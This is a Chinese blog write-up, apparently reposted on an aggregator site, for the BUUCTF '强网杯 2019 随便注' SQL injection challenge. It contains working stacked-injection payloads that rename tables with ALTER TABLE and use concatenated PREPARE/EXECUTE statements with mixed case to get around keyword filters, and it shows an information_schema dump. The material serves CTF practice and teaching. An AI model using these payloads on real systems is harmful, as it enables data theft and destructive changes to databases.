美文网首页
BUUCTF-[强网杯 2019]随便注 记录

BUUCTF-[强网杯 2019]随便注 记录

作者: 低调求发展 | 来源:发表于2020-10-19 16:52 被阅读0次

[强网杯 2019]随便注

进入该界面

正常步骤注入:

存在注入,order by 看看几个字段,3返回错误,说明两个字段。

union select联合查询,发现过滤了select这些关键字

这时候想到堆叠注入,试一下

可以看到列出了数据库,说明存在堆叠注入。

然后显示表看看

存在两张表,分别查看下字段。

可以看到1919810931114514中有我们想要的flag字段,但只有再words表里面会回显数据

内部查询语句类似 : select id, data from word where id =

这时候虽然有强大的正则过滤,但没有过滤alert和rename关键字

这时候我们就可以已下面的骚姿势进行注入:

1.将words表改名为word1或其它任意名字

2.1919810931114514改名为words

3.将新的word表插入一列,列名为id

4.将flag列改名为data

构造payload:

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

然后使用1' or 1=1#进行查看。

方法二:直接使用预处理查看数据

1';set @a=concat("sel","ect flag from `1919810931114514`");prepare hi from @a;execute hi;# 但strstr过滤了set和prepare

改成大写:

1';Set @a=concat("sel","ect flag from `1919810931114514`");Prepare hi from @a;execute hi;#

预处理:

PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字供之后调用

EXECUTE :执行命令

DEALLOCATE PREPARE:释放命令

示例:set @a=concat("sel","ect"," group_con","cat(table_n","ame) ","fro","m"," infor","mation_sc","hema.tabl","es"," whe","re tabl","e_","sche","ma=datab","ase()");

prepare dump from @a;

 execute dump;

相关文章

  • BUUCTF-[强网杯 2019]随便注 记录

    [强网杯 2019]随便注 进入该界面 正常步骤注入: 存在注入,order by 看看几个字段,3返回错误,说明...

  • 强网杯2019 随便注

    buuctf第二题。根据题目提示可知是sql注入题先进入页面,发现一个输入框且有缺省值1,先在1后加上单引号,出现...

  • [强网杯 2019] 随便注

    每天学习网络安全知识,本文记录强网杯的一个SQL注入题。 使用单引号测试,发现页面报错,说明此处存在SQL注入漏洞...

  • 强网杯2019-WEB-随便注

    漏洞复现地址https://buuoj.cn/challenges#[强网杯%202019]随便注] 考察SQL注...

  • BUUCTF/强网杯2019 随便注.堆叠注入?

    尝试注入发现过滤 /i不区分大小写匹配,也过滤了.sqlmap跑一波 能跑出数据库为surpersqli,但是因为...

  • 2019-强网杯-Web-随便注

    复现环境 https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9...

  • 2019-09-15 BUUCTF [强网杯 2019]随便注

    首先尝试了直接无过滤提取数据数据库,发现失败了(select等关键词被过滤)查看了别人的题解发现这题支持多语句执行...

  • BUUCTF-[网鼎杯 2018]Fakebook 记录

    25.[网鼎杯 2018]Fakebook 首先打开界面如下,有两个按钮login、join,试了下login登录...

  • 浅析mysql存储过程

    去年的强网杯,出了一道mysql堆叠注入叫随便注,这道题被好多比赛玩了一整年,直到现在还是有各种新姿势,但是今天我...

  • 强网杯2019 wp

    膜大佬们太强了,弱小的我只能鞭尸强网先锋。 签到 直接提交 强网先锋-上单 进入页面http://49.4.15....

网友评论

      本文标题:BUUCTF-[强网杯 2019]随便注 记录

      本文链接:https://www.haomeiwen.com/subject/noxlmktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|BUUCTF-[强网杯 2019]随便注 记录|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!